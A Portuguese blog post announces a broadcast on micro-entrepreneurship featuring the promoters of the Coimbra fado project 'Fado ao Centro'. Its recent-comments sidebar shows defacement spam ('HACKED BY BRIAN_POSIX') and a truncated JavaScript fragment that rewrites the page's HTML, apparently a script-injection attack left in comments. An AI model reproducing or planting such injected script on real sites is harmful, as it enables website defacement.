No espaço "Luz ao Fundo da Carteira" já dedicamos uma emissão ao micro-empreendorismo, mas numa vertente teórica. Muitos jovens e desempregados para fazerem face ao complicado momento actual decidem lançar o seu próprio negócio, no entanto uma mera abordagem teórica é claramente insuficiente uma vez que no terreno há inúmeras surpresas, dificuldades e é fundamental ser pro-activo na gestão de um novo projecto...

Com o intuito de analisar um projecto real de empreendorismo, convidei os promotores do projecto "Fado ao Centro" (Fado & Arte em Coimbra) para estarem na próxima emissão de forma a partilharem 3 aspectos fundamentais:
1. Antes do lançamento do projecto o que foi feito: Como foi desenvolvida a ideia? Como foi analisada a viabilidade do projecto? Qual o investimento inicial?

2. Após o lançamento do projecto: que desafios surgiram? Conseguiram alcançar o sucesso desejado? Determinação do nível de custos e facturação (e percepcionar se estão de acordo com o que foi projectado)…

3. Qual a estratégia de crescimento para o futuro?

Aprender com quem já está no terreno, é uma forma para reforçar os nossos conhecimentos, evitar erros basilares e serve ainda como fonte de inspiração para ganhar a coragem e ir para a frente…

No final vamos ter uma atuação ao vivo de fado, uma cortesia do “Fado ao Centro”.


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO